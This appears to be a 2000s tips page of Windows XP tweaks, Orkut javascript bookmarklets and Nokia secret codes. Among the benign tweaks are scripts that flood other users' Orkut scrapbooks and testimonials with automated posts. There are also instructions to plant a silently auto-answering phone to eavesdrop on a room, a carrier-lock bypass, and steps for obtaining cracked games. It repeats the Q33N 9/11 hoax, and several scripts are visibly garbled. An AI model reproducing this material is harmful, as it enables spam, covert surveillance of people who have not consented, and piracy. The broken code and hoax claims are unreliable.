Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.


**new **
Crazy !!
Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"


Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


n u are done..

~cheers~

System information

system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
'systeminfo'. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only).

lock pc just by double clicking mouse

You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter 'rundll32.exe
user32.dll,LockWorkStation' in the location field.
Give the shortcut a name you like. That's it -- just
double click on it and your computer will be locked.
And if that's not easy enough, Windows key + L will do
the same.


SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)


Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..

Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

~ Cheers ~


*

Remove the Username and picture from Windows XP New Start Menu

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say...

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You'll end up with a blue space at the top of the Start Menu.


To get back the username and the picture, reverse the above procedure.



For the New Start Menu, Windows XP looks for the .bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

~ Cheers ~.
Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!

Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

or

Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...

NOTEPAD "world trade centre trick".. :Rahul


Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.
WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~

SPEED UP MENU DISPLAY.!!


When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.


CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!


Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.
CD ROM STOPS AUTOPLAYING/AUTORUN.!!


And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".
How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"

DISPLAY MESSAGE ON STARTUP.


Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

AUTO DELETE TEMPORARY FOLDER.!!

ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

make ur pdf files to speak

make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher

ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

Recycle Bin Renaming

Hey Guys just follow thse simple steps and change the name of your Recycle Bin(where temporarely deleted files are stored)
1)Goto 'start' menu and Choose 'Run' command.
2)Type 'regedit' (without inverted commas). U will see Registery Editor Window on Ur Screen.
3)Now, On the Left Hand Side of the Window you'll see a Tree of folders Just DoubleClick on the HKEY_CURRENT_USER folder>Now in the new folder Tree DoubleClick on the 'Software' folder > then DoubleClick on 'Microsoft' folder>'Windows' folder>'Current Version' folder>'Explorer' folder>'CLSID' folder.
4)Now, You will see a Tree of 3 or 4 folder(don't worry about the no. of folders). Just Click on the folder : '{645FF040-5081-101B-9F08-00AA002F954E}'.
5)Finally, after Clicking on '{645FF040-5081-101B-9F08-00AA002F954E}' folder Goto the Right Hand Side of the Same window and Double Click On the Default Option and Write in the name You want for Your Recycle Bin e.g. :- Trash #. CLick O.K. button.

Goto Your Desktop and Refresh the Desktop and See the magic.
Your Recycle Bin has been Renamed.
Please Reply

Orkut Tricks

For sending scraps without name follow the steps:
1) Open edit profile
2) Delete First and Second Name
3) Then on the first name text box type ALT + 0173 (i.e. Type 0173 while pressing the ALT key of your keyboard.)
4) Do the same in the Second Name Box.
5) Click Update.
Now you are done you can send scraps without your name

Send Invisible Scrap
So, Friend's welcome to the very first orkut trick.Step1: Open scrapbook Step2: Write [i] and submit it, an invisible scrap will b sendNote: Don't Write Anything Else [i]You can try these various combinations also if u want to send a big no of invisible scraps, as after your few submissions it will start displaying the message "message sent too recently". So try these combinations out: [u] [b] [i][u] [i][b] [u][i] [u][b] [u][i][b] [i][u][b] [i][u][b][i] . . .And just keep on increasing it will continue no limits...
One more method
Enter ் no space b/w the symbol and number, blank scrap will be send.
Orkut
Yahoo
Gmail
Msn
Other

Ads Link
Support Us

Tell A Friend
Bookmark Us
MakeHomepage



Ads Link

Copyright © 2006-07 MastiTrain .com No Limits of Fun Here
Contact Us link Exchange Advertise Here Tell a Friend
Mirror Message
For writing mirror scrap, follow the steps:
1) Open any scrapbook.
2) Type Your message after ‮.
3) Click Submit
Result reverses the message
Who Has Added U in There Crush List
To know who has added U in there Crush List, Follow the steps:
1) Add your friends in your crush list.
2) A message will arrive you from orkut in any of those have added you in their lists within five minutes.
3) After the use remove friends from crush list, so that if they try, they don't catch you.
Friend Image Doubler
For Doubling the Image of Friend's List, follow the steps:
1) Open any profile whose friends' images you wish to double.
2) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
3) Hit ENTER key of your keyboard.
javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)
Image to Text
Top of Form
Image: (Supported files: GIF, JPEG, PNG, BMP)Foreground color: Background color: Invert colors? Size: Width (in characters):
Bottom of Form
Long Name in Profile
For writing long names, follow the steps:
1) Create a new account on orkut.
2) Before entering your first name run this script.
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));
3) And run this script before entering second name
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));
4) Now you can write first & second name of max. 200 characters each.
Scrapbook Flooder
For Flooding the scrapbook of Yours or Friend's, follow the steps:
1) Open any Scrapbook that you want to flood.
2) Type the message in the scrapbook (optional).
2) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:i=1;sar=document.getElementsByTagName('textarea').item(0).value;document.body.innerHTML+='';document.forms[1].target='sar';setInterval("document.getElementsByTagName('textarea').item(0).value=sar +'%5bsilver%5d'+ i;a=submitForm(document.forms[1], 'submit', '');i++",1500);void(0)
3) Hit ENTER key of your keyboard.
Shake It In Style
For Shaking the screen of ur friend and giving a message, follow the steps:
1) Open your Scrapbook.
2) Type the message and mirror it by ‮. If Not clear Click Here
3) Then copy this in the place highlighted in blue.
4) Now copy the script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:function flood(n) {if (self.moveBy) {for (i = 15; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);{ var inp = "Enter your text here in mirror form"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
Note: For those who still could not get what is mirror form; If I type mastitrain.com then moc.niartitsam is it's mirror form.
5) Hit ENTER key of your keyboard.
6) Refresh Page to stop Flooding Or close the window.
Testimonial Flooder
For flooding testimonial, follow the steps:
1) Open your friends profile.
2) Click on "Write Testimonial" on the left.
3) The page showing the text box for writing the testimonial appear.
4) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='';document.forms[1].target='TextFlooding';setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=sar +' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0)
5) Hit ENTER key of your keyboard.
6) Refresh Page to stop Flooding Or close the window.
Profile Image Doubler
For Doubling the Image in the profile, follow the steps:
1) Open any Profile.
2) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5))
3) Hit ENTER key of your keyboard.
Image Rolling Effects
For Rolling the images all around, follow the steps:
1) Open any page on Orkut.
2) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:R=-1;DI=document.images;DIL=DI.length;function
A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function
B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)
3) Hit ENTER key of your keyboard.
Handwriting Change
For sending colorful scraps , follow the steps:
1) Open scrapbook.
2) Write your message in the scrapbook. Do NOT click on submit.
3) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;yjavascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;yjavascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Ã…");txt.value=txt.value.replace(/B/gi,"ß");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ð");txt.value=txt.value.replace(/E/gi,"Ë");txt.value=txt.value.replace(/F/gi,"Æ’");txt.value=txt.value.replace(/i/gi,"î");txt.value=txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value.replace(/r/gi,"®");void(0);
javascript:cor=new Array('b','blue','u',':)','red','i',':p','green','b',':d','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;yjavascript:cor=new Array('b','blue','u','red','i','green','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y4) Hit ENTER key of your keyboard.
5) Click on Submit
Colors on Orkut
For changing colors, follow the steps:
This Script Changes The Color Of YourHome Friends Messages Communities Search Media News etc
1) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript: i=0; c=["green","blue","yellow"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);v
2) Hit ENTER key of your keyboard.
Signature in scraps
For adding signatures, follow the steps:
1) Type scrap in scrapbook.
2) Write your message in the scrapbook. Do NOT click on submit.
3) Copy the following script and paste it in your address bar (i.e the place where u type www.mastitrain.com)
javascript: a=document.getElementsByTagName('textarea')[0];a.value="[b ][i ][red ]"+a.value+"\n\n\n[orange ]♪ mastitrain.com♪\n\n";void(0)
4) Hit ENTER key of your keyboard.
5) Click on Submit
Note: Replace Mastitrain in script by your name or message.






## crazy scriptscrazy scriptsjust copy paste them in ur adress barand press enterjavascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)__________________javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)few more.....javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);_________________javascript:function reverse() { var inp = " ! dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse(); _________________ javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*2;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0) ------------------------------------------------------------ javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0) __________________ javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0) _________________ javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);_________________javascript:function reverse() { var inp = " ! dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();_________________javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*2;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)_________________javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)_________________javascript:document.images%5B2%5D.src%3D%22http%3A//i%6Da%67es3%2Eor%6But%2Ecom/i%6Da%67es/%6Dittel/62/164%39762%2E%6A%70%67%22%3Bvoid%280%29__________________javascript:for(vara=0;a___________________JUST COPY THEM...PASTE THEM TO ADDRESS BAR...AND PRESS GO...SEE THE EFFECT...WHO SAYS SCRIPTS DONT GO WITH ORKUT...If u like the stuff leave comments

Nokia All Codes

Scroll Down to view Specific Model Numbers!!!!
*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion, we accept no responsiblility for blocked pones while using these codes!!! IMEI Number *#06# Cells Identity Code (IMEI = International Mobile Equipment Identity) XXXXXX XX XXXXXX X TAC FAC SNR SP TAC = Type Approval Code (first 2 digits = country code of the approval-country ) FAC = Final Assembly Code: (01,02 = AEG) (10,20 Nokia) (40,41,44 Siemens) (30 Ericsson) (50 Bosch) (51 Sony,Siemens,Ericsson) (60 Alcatel) (65 AEG) (70 Sagem) (75 Dancall) (80 Philips) (85 Panasonic) SNR = Serial Nr. SP = Spare (always "0") Software Version *#0000# shows the software version Signal Processing *3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart. #3370# - Enchanced full Rate Codec (EFR) deactivation *4720# - Half Rate Codec activation. It will automatically restart. #4720# - Half Rate Codec deactivation Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5% Sim Clock Stopping *#746025625# [*#sim0clock#] Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59. It will tell you if it can be stopped or not.Warrenty Menu *#92702689# takes you to a secret menu with 6 choices: [*#war0anty#] 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997). 3. Displays (if there) the date where the phone was purchased (MMYY). 4. Displays the date of the last repairment - if found (0000). 5. Makes you capable of transferring user data if you have the gear for it. 6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register. Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx 1. Insert SIM card of different provider. 2. Turn on the phone and press the UP VOLUME key for 3 sec. Then release it and the phone says PIN CODE? 3. Press the "C" key. 4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN# Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^) The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! ) 1. Enter your menu 2. Select settings 3. Select security settings 4. Select closed user group 5. Select on 6. Enter 00000 7. Press ok 8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated. Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.
The James Bond Trick
If you short-circuit the left middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying! Network Monitor There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone. Check your software version. You can only continue if you have v4.33, v4.73 or v5.24. Take apart the phone. De-solder the EEPROM (ATMEL AT 24C64) Read out the data with an EEPROM programmer and save it to a file (Backup) If you have v.33 or v4.73, change the address "03B8" from "00" to "FF" If you have v5.24 then change the address "0378" from "00" to "FF" Write the new data to the EEPROM and solder it back to the phone Power on your phone and you should have "Netmonitor" enabled. The Network Monitor gives you the following information: Carrier number, MS RX Level in DBM, Received signal quality, MS TX power level, C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99, RTL (Radio link timeout), Timeslot, Indication of the transmitter status, Information on the Network parameters, TMSI (Temporary Mobile Subscriber Identity), Cell identification (Cell ID, Number of cells being used), MCC (Mobile country code), MCN (Mobile network code), LAC (Location area code), Ciphering (On/Off), Hopping (On/Off), DTX (On/Off), Discard cell barred information. Game Hacking with Blizzard Get the file called the 'BlizzardN-GAGE.SIS' from IRC get in #mediaplace on Efnet (note: Downloading cracked/Hacked games is illegal unless you already own a copy of game) The Blizzard Nokia N-Gage Installer. 1. Unpack Blizzard.sis file that you get from mIRC 2. Transfer the .sis file to your N-Gage 3. Get the .blz (N-gage ROM) from mIRC 4. copy the file to the root dir of your MMC (16MB MMC)Multimedia Card 5. Use the Blizzard application to unpack the .blz file 6. After unpacking the sonic icon should appeared in the MENU 7. Clicked sonic icon and it should work ! List of compatible games for the 3650,6600 and the N-gage that work: [3650] SonicN (v.2.5+) Puyo Pop (v.2.5+) [6600] SonicN Puyo Pop Pandemonium Tomb Raider Super Monkey Ball Tony Hawks Pro Skater [N-Gage] SonicN Puyo Pop Pandemonium Tomb Raider Super Monkey Ball Tony Hawks Pro Skater GSM Network Services Command Strings When various network functions are selected via the cellphone's menu using the keypad, the cellphone automatically generates the corresponding GSM network command string and transmits it to the network. These commands can however be manually entered via the keypad. Each command is prefixed with either one or two * or # characters as follows: ** Register and Activate * Activate ## De-Register (and Deactivate) # Deactivate *# Check Status © Call button Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678). Command Description Command String Security Change call barring code **03*OldCode*NewCode*NewCode#© Change call barring code **03*330*OldCode*NewCode*NewCode#© Change PIN code **04*OldPIN*NewPIN*NewPIN#© Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#© Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#© Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#© Display IMEI *#06# Call Forwarding (Diversions) De-register all call diversions ##002#© Set all configured call diversions to number and activate **004*number#© De-register all configured call diversions (no answer, not reachable, busy) ##004#© Unconditionally divert all calls to number and activate **21*number#© Activate unconditionally divert all calls *21#© De-register unconditionally divert all calls ##21#© Deactivate unconditionally divert all calls #21#© Check status of unconditionally divert all calls *#21#© Divert on no answer to number and activate **61*number#© Activate divert on no answer *61#© De-register divert on no answer ##61#© Deactivate divert on no answer #61#© Check status of divert on no answer *#61#© Divert on not reachable to number and activate **62*number#© Activate divert on not reachable *62#© De-register divert on not reachable ##62#© Deactivate divert on not reachable #62#© Check status of divert on not reachable *#62#© Divert on busy to number and activate /td> **67*number#©<> *#330*code#©< Activate barr all outgoing international calls **331*code#© Deactivate barr all outgoing international calls #331*code#© Check status of barr all outgoing international calls *#331#© Activate barr all outgoing international calls except to home country **332*code#© Deactivate barr all outgoing international calls except to home country #332*code#© Check status of barr all outgoing international calls except to home country *#332#© Activate barr all outgoing calls **333*code#© Deactivate barr all outgoing calls #333*code#© Check status of barr all outgoing calls *#333#© Activate barr all incoming calls **35*code#© Deactivate barr all incoming calls #35*code#© Check status of barr all incoming calls *#35#© Activate barr all incoming calls when roaming **351*code#© Deactivate barr all incoming calls when roaming #351*code#© Check status of barr all incoming calls when roaming *#351#© Activate barr all incoming calls **353*code#© Deactivate barr all incoming calls #353*code#© Check status of barr all incoming calls *#353#© Call waiting Activate call waiting *43*#© Deactivate call waiting #43##© Check status of call waiting *#43#© Calling Line Identification The following only works if CLIP and CLIR are enabled (ask your service provider) CLIP: Presentation of the number of the incoming call Activate CLIP **30#© Deactivate CLIP ##30#© Check status of CLIP *#30#© CLIR: Presentation of one's own number to the to the called party Activate CLIR **31#© Activate CLIR for the actual call *31#number© Deactivate CLIR ##31#© Deactivate CLIR for the actual call #31#number© Check status of CLIR *#31#© COLP: Presentation of the actual number reached (if number called was diverted to another number Activate COLP *76#© Deactivate COLP #76#© Check status of COLP *#76#© COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone) Activate COLR *77#© Deactivate COLR #77#© Check status of COLR *#77#© Cellphone Services 10 All types of cellphone services 11 Speech service 12 Data service 13 Fax 14 Datex-J 15 Teletex 16 Short message service (SMS) 18 All data services without SMS 19 All cellphone services without SMS Carrier Services 20 All services 21 All asynchronous services 22 All synchronous services 23 3.1kHz services 24 Synchronous point-to-point connections including PAD's (all synchronous data services) 25 Asynchronous point-to-point connections including PAD's (all asynchronous data services) 26 Data packet sending including PAD's (all synchronous data packet services) 27 Services with PAD-share 29 Digital connection with 12kbps GSM Network Service Codes Note that at present only the following service codes are in use: 11 Speech 13 fax 25 data Cell Broadcast While Short Message Service (SMS) can be configured as a personal service, Cell Broadcast is a general service which is designed for subscribers of a specific cell or topic. For example, a subscriber to cell 050 in England will receive information on the GSM tower currently being used by their phone. This new concept brings a whole new meaning to the term mobile communications as the phone is now able to receive information such as share prices or weather updates without the need of data cards and computers. At present the following message types exist (note: this may vary from carrier to carrier and some carriers may charge for this service): Code Title 000 Index 010 Flashes 020 Hospitals 022 Doctors 024 Pharmacy 030 Long Distant Road Reports 032 Local Road Reports 034 Taxis 040 Weather 050 District 052 Network Information 054 Operator Services 056 Directory Inquiries (national) 057 Directory Inquiries (international) 058 Customer Care (national) 059 Customer Care (international) In the future one will be able to control each individual call by use of the following service codes. To do this the user has to insert the service code in front of the last # in the MMI command above.
Or More
Secret Codes for some Nokia modelsNokia 9000/9000i To view IMEI number *#06# To view Software Version enter *#8110# Latest Version is under Phone Info. To view Week and Year of manufacture enter *#3283# Nokia 9110 *#06# for checking the IMEI (International Mobile Equipment Identity) *#0000# shows the SW version. Latest software version: v5.02 (26-08-99)RAE-2 Nokia 7110 *#06# for checking the IMEI (International Mobile Equipment Identity) *#0000# To view Software Version. *#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart. *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart. *#4720# - Half Rate Codec activation. It will automatically restart *#4720* - Half Rate Codec deactivation. It will automatically restart *#746025625# - Sim clock allowed status. *#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices: 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997) 3. Displays (if there) the date where the phone was purchased (MMYY) 4. Displays the date of the last repairment - if found (0000) 5. makes you capebel of transferring user data if you have the gear for it 6. shows how many hours the phone has been on Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with these version. V 4.76 13-01-00 NSE-5 V 4.75 07-01-00 NSE-5 V 4.73 15.11.99 NSE-5 Nokia 6190 *#06# for checking the IMEI (International Mobile Equipment Identity) *#6190# shows the SW version. *#92772689# (after removing the analog module) shows service menu. *3001#12345[OK] to enter test mode. *#639# to change NAM. Nokia 3810 To view IMEI number *#06# To view Software Version enter *#3810# Nokia 6120 / 6160 / 6162 (TDMA phones) *#92772689# for checking ISDN number. *3001#12345# for field test mode and nam selection and some other stuff... *#9999# shows the SW versionNokia 3210 